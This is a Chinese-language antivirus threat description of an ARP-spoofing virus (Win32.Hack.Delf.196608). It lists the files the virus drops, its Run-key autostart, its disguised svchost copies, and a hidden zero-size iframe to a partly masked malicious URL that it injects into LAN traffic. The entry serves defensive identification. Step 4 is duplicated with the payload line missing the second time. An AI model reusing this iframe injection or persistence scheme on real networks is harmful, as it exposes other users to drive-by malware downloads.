ARP欺骗196608
Win32.Hack.Delf.196608
病毒名称(中文):
ARP欺骗196608病毒别名:
威胁级别:
病毒类型:
网页病毒病毒长度:
196608影响系统:
Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:
这是一个ARP病毒。只要中了该病毒,在局域网内的机器打开浏览器浏览网页时,毒霸会一直报病毒。该病毒
利用传送数据包时嵌入带病毒的HTML代码,访问恶意网址下载恶意病毒。
1. 病毒运行后,首先释放以下病毒文件
%Systemroot%system32\\Packet.dll
%Systemroot%system32\\wpcap.dll
%Systemroot%system32\\WanPacket.dll
%Systemroot%system32\\Drivers\pf.sys
2. 创建自启动
在 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 下
创建 KVP 项,启动参数为: C:\\WINDOWS\\system32\\drivers\\svchost.exe
3. 该病毒会将自身复制到 %Systemroot%system32\\Drivers\\svchost.exe.
并运行 %Systemroot%system32\\Drivers\\svchost.exe, 之后又把 scvhost.exe
(注: 与 svchost.exe 区分开来),释放到%Systemroot%system32\\Drivers 目录下.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
iframe src=''http://www.z****0.com/0.htm'' width=0 height=0
使局域网其它用户访问其恶意网址.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
使局域网其它用户访问其恶意网址.